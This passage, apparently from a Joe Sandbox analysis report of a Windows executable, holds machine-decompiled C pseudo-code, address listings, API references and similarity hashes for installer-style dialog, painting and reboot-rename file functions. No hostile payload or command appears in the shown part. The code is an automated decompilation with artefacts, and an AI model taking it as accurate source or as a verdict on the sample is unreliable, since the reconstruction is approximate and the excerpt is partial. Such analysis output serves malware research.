										goto L61;
									}
									ShowWindow( *0x42ebd8, 8);
									E00404072(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ac - _t134;
								if( *0x42f4ac != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4a0 - _t134;
								if( *0x42f4a0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebd8);
						 *0x42f408 = _t134;
						EndDialog(_t126,  *0x429c40);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebd8, 0x40f, 0, 1);
						__eflags =  *0x42ebcc - _t134; // 0x1
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a850, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a850,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E0040408D(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebd8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ac - _t134;
										if( *0x42f4ac == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c40 = 1;
											L21:
											_push(0x78);
											L22:
											E00403FFF();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c40 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebd8);
						 *0x42ebd8 = _a12;
						L58:
						_t142 =  *0x42b870 - _t134; // 0x0
						if(_t142 == 0) {
							_t143 =  *0x42ebd8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b870 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                0x00403b5b
                0x00403b64
                0x00403ca5
                0x00403ca9
                0x00403cad
                0x00403caf
                0x00403cb4
                0x00403cbf
                0x00403cca
                0x00403ccf
                0x00403cd1
                0x00403cd3
                0x00403cd6
                0x00403cdb
                0x00403ce9
                0x00403cf6
                0x00403cfd
                0x00403cfd
                0x00403cfe
                0x00403cfe
                0x00403d03
                0x00403d09
                0x00403d10
                0x00403d16
                0x00403d18
                0x00403d58
                0x00403d5d
                0x00403d62
                0x00403d62
                0x00403d67
                0x00403d70
                0x00403d72
                0x00403d77
                0x00403d7d
                0x00403d81
                0x00403d81
                0x00403d86
                0x00403d8c
                0x00000000
                0x00000000
                0x00403d97
                0x00403d9d
                0x00000000
                0x00000000
                0x00403da6
                0x00403dae
                0x00403db3
                0x00403db6
                0x00403dbc
                0x00403dc1
                0x00403dc4
                0x00403dca
                0x00403dcf
                0x00403dd2
                0x00403dd8
                0x00403de0
                0x00403de6
                0x00403dec
                0x00403df0
                0x00403df7
                0x00403df7
                0x00403df7
                0x00403e01
                0x00403e13
                0x00403e1f
                0x00403e24
                0x00403e2e
                0x00403e34
                0x00403e36
                0x00403e3b
                0x00403e38
                0x00403e38
                0x00403e38
                0x00403e4b
                0x00403e63
                0x00403e65
                0x00403e6b
                0x00403e80
                0x00403e6d
                0x00403e76
                0x00403e78
                0x00403e78
                0x00403e86
                0x00403e97
                0x00403ea8
                0x00403eaf
                0x00403eb5
                0x00403eb9
                0x00403ebe
                0x00403ec0
                0x00000000
                0x00403ec6
                0x00403ec6
                0x00403ec8
                0x00000000
                0x00000000
                0x00403ece
                0x00403ed2
                0x00403ef7
                0x00403efd
                0x00403f03
                0x00403f05
                0x00000000
                0x00000000
                0x00403f2b
                0x00403f31
                0x00403f33
                0x00403f38
                0x00000000
                0x00000000
                0x00403f3e
                0x00403f41
                0x00403f44
                0x00403f5b
                0x00403f67
                0x00403f80
                0x00403f86
                0x00403f8a
                0x00403f8f
                0x00403f95
                0x00000000
                0x00000000
                0x00403f9f
                0x00403faa
                0x00000000
                0x00403faa
                0x00403ed4
                0x00403eda
                0x00000000
                0x00000000
                0x00403ee0
                0x00403ee6
                0x00000000
                0x00000000
                0x00000000
                0x00403eec
                0x00403ec0
                0x00403fb7
                0x00403fc3
                0x00403fca
                0x00000000
                0x00403d1a
                0x00403d1a
                0x00403d1d
                0x00403d50
                0x00403d50
                0x00403d52
                0x00000000
                0x00000000
                0x00000000
                0x00403d52
                0x00403d1f
                0x00403d23
                0x00403d28
                0x00403d2a
                0x00000000
                0x00000000
                0x00403d3a
                0x00403d42
                0x00000000
                0x00403d48
                0x00403b76
                0x00403b76
                0x00403b7a
                0x00403b7f
                0x00403b8e
                0x00403b8e
                0x00403b97
                0x00403ba0
                0x00403bab
                0x00403bab
                0x00403bb7
                0x00403bd3
                0x00403bd6
                0x00403be9
                0x00403bef
                0x00403c92
                0x00000000
                0x00403c9b
                0x00403bf5
                0x00403c02
                0x00403c04
                0x00403c06
                0x00403c25
                0x00403c25
                0x00403c28
                0x00403c2d
                0x00403c30
                0x00403c40
                0x00403c41
                0x00403c43
                0x00403c79
                0x00403c8c
                0x00000000
                0x00403c8c
                0x00403c45
                0x00403c4b
                0x00403c64
                0x00403c69
                0x00403c6b
                0x00000000
                0x00000000
                0x00403c6d
                0x00403c59
                0x00403c59
                0x00403c5b
                0x00403c5b
                0x00000000
                0x00403c5b
                0x00403c4e
                0x00403c53
                0x00000000
                0x00403c53
                0x00403c32
                0x00403c38
                0x00000000
                0x00000000
                0x00403c3a
                0x00000000
                0x00403c3a
                0x00403c2a
                0x00000000
                0x00403c2a
                0x00403c10
                0x00403c17
                0x00403c1d
                0x00403c1f
                0x00000000
                0x00000000
                0x00000000
                0x00403c1f
                0x00403bdb
                0x00000000
                0x00403bb9
                0x00403bbf
                0x00403bc9
                0x00403fd0
                0x00403fd0
                0x00403fd6
                0x00403fd8
                0x00403fde
                0x00403fe3
                0x00403fe9
                0x00403fe9
                0x00403fde
                0x00403ff3
                0x00000000
                0x00403ff3
                0x00403bb7

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8E
                • ShowWindow.USER32(?), ref: 00403BAB
                • DestroyWindow.USER32 ref: 00403BBF
                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BDB
                • GetDlgItem.USER32 ref: 00403BFC
                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C10
                • IsWindowEnabled.USER32(00000000), ref: 00403C17
                • GetDlgItem.USER32 ref: 00403CC5
                • GetDlgItem.USER32 ref: 00403CCF
                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403CE9
                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D3A
                • GetDlgItem.USER32 ref: 00403DE0
                • ShowWindow.USER32(00000000,?), ref: 00403E01
                • EnableWindow.USER32(?,?), ref: 00403E13
                • EnableWindow.USER32(?,?), ref: 00403E2E
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E44
                • EnableMenuItem.USER32 ref: 00403E4B
                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E63
                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E76
                • lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EA0
                • SetWindowTextA.USER32(?,0042A870), ref: 00403EAF
                • ShowWindow.USER32(?,0000000A), ref: 00403FE3
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                • String ID:
                • API String ID: 184305955-0
                • Opcode ID: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
                • Instruction ID: 825bbfaa6b66e15a56cde4951677423d70b10f791e0768be12abaf391e468a8e
                • Opcode Fuzzy Hash: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
                • Instruction Fuzzy Hash: 80C19F71604205AFDB206F22EE45E2B3EBCFB4570AF40053EFA42B11E1CB7999429B1D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040416F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E0040416F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x42983c =  *0x42983c + 1;
								__eflags =  *0x42983c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040408D(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42e3a0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E00404413(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f408, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f408, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x42983c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x42a048 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00404048(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004043EF();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42ebdc; // 0x84bb3a
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42f458;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E0040413A;
					E00404026(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00404026(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00404048( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E0040405B(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x42f414 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x42983c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x42983c = 0;
					return 0;
				}
			}



















                0x0040417f
                0x00404291
                0x004042a4
                0x00404300
                0x00404300
                0x00404304
                0x004043ca
                0x004043d1
                0x004043d3
                0x004043d3
                0x004043d3
                0x004043d9
                0x004043d9
                0x004043dc
                0x00000000
                0x004043e3
                0x00404312
                0x00404314
                0x00404317
                0x0040431e
                0x00404320
                0x00404327
                0x00404329
                0x0040432c
                0x0040432f
                0x00404334
                0x0040433a
                0x0040433d
                0x00404344
                0x00404352
                0x0040436a
                0x0040436c
                0x00404374
                0x00404383
                0x00404385
                0x00404385
                0x00404344
                0x00404327
                0x00404388
                0x0040438f
                0x00000000
                0x00404391
                0x00404391
                0x00404398
                0x00000000
                0x00000000
                0x0040439a
                0x0040439e
                0x004043af
                0x004043af
                0x004043b1
                0x004043b5
                0x004043c3
                0x004043c3
                0x00000000
                0x004043c7
                0x0040438f
                0x004042ac
                0x004042af
                0x00000000
                0x00000000
                0x004042b7
                0x004042bd
                0x00000000
                0x00000000
                0x004042c9
                0x004042cc
                0x004042cf
                0x00000000
                0x00000000
                0x004042f2
                0x004042f2
                0x004042f4
                0x004042f6
                0x004042fb
                0x00000000
                0x00404185
                0x00404185
                0x00404188
                0x0040418d
                0x0040418f
                0x0040419e
                0x0040419e
                0x004041a5
                0x004041a8
                0x004041aa
                0x004041af
                0x004041b8
                0x004041be
                0x004041ca
                0x004041cd
                0x004041d6
                0x004041db
                0x004041de
                0x004041e3
                0x004041fa
                0x00404201
                0x00404214
                0x00404217
                0x0040422c
                0x00404233
                0x00404238
                0x0040423d
                0x0040423d
                0x0040424c
                0x0040425b
                0x0040426d
                0x00404272
                0x00404282
                0x00404284
                0x00000000
                0x0040428a

                APIs
                • CheckDlgButton.USER32 ref: 004041FA
                • GetDlgItem.USER32 ref: 0040420E
                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040422C
                • GetSysColor.USER32(?), ref: 0040423D
                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040424C
                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040425B
                • lstrlenA.KERNEL32(?), ref: 0040425E
                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040426D
                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404282
                • GetDlgItem.USER32 ref: 004042E4
                • SendMessageA.USER32(00000000), ref: 004042E7
                • GetDlgItem.USER32 ref: 00404312
                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404352
                • LoadCursorA.USER32 ref: 00404361
                • SetCursor.USER32(00000000), ref: 0040436A
                • LoadCursorA.USER32 ref: 00404380
                • SetCursor.USER32(00000000), ref: 00404383
                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043AF
                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                • String ID: :A@$N
                • API String ID: 3103080414-504195219
                • Opcode ID: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                • Instruction ID: 4cc5751811e84191dd39768f0d3a0055f5535ab869bb222e46a2b56927204bf5
                • Opcode Fuzzy Hash: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                • Instruction Fuzzy Hash: DA6183B1A00205BFEB10AF61DD45F6A7B69EB84715F00413AFB05BA1D1C7B8A951CF98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f414;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f408;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                0x0040100a
                0x00401039
                0x00401047
                0x0040104d
                0x00401051
                0x0040105b
                0x00401061
                0x00401064
                0x004010f3
                0x00401089
                0x0040108c
                0x004010a6
                0x004010bd
                0x004010cc
                0x004010cf
                0x004010d5
                0x004010d9
                0x004010e4
                0x004010ed
                0x004010ef
                0x004010ef
                0x00401100
                0x00401105
                0x0040110d
                0x00401110
                0x00401112
                0x00401118
                0x0040111f
                0x00401126
                0x00401130
                0x00401142
                0x00401156
                0x00401160
                0x00401165
                0x00401165
                0x00401110
                0x0040116e
                0x00000000
                0x00401178
                0x00401010
                0x00401013
                0x00401015
                0x0040101f
                0x0040101f
                0x00000000

                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F$Setup Setup
                • API String ID: 941294808-1602013819
                • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405BD4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405BD4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c600 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca00, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c200, "%s=%s\r\n", 0x42c600, 0x42ca00);
						_t53 = _t52 + 0x10;
						E00405F87(_t37, 0x400, 0x42ca00, 0x42ca00,  *((intOrPtr*)( *0x42f414 + 0x128)));
						_t12 = E00405AFE(0x42ca00, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405B76(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405A63(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405A63(_t38, _t21 + 0xa, 0x40a3b8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405AB9(_t24 + _t46, 0x42c200, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405BA5(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405AFE(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c600, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                0x00405bd4
                0x00405bdd
                0x00405be4
                0x00405bf8
                0x00405c20
                0x00405c2b
                0x00405c2f
                0x00405c4f
                0x00405c56
                0x00405c60
                0x00405c6d
                0x00405c72
                0x00405c77
                0x00405c7b
                0x00405c8a
                0x00405c8c
                0x00405c99
                0x00405c9d
                0x00405d38
                0x00000000
                0x00405cb3
                0x00405cc0
                0x00405ce4
                0x00405ce8
                0x00405d07
                0x00405d0b
                0x00405d0b
                0x00405d0d
                0x00405d16
                0x00405d21
                0x00405d2c
                0x00405d32
                0x00000000
                0x00405d32
                0x00405cea
                0x00405ced
                0x00405cf8
                0x00405cf4
                0x00405cf6
                0x00405cf7
                0x00405cf7
                0x00405cff
                0x00405d01
                0x00000000
                0x00405d01
                0x00405ccb
                0x00405cd1
                0x00000000
                0x00405cd1
                0x00405c9d
                0x00405c7b
                0x00405bfa
                0x00405c05
                0x00405c0e
                0x00405c12
                0x00000000
                0x00000000
                0x00405c12
                0x00405d43

                APIs
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
                • GetShortPathNameA.KERNEL32 ref: 00405C0E
                  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                • GetShortPathNameA.KERNEL32 ref: 00405C2B
                • wsprintfA.USER32 ref: 00405C49
                • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
                • GlobalFree.KERNEL32 ref: 00405D32
                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39
                  • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00405B02
                  • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
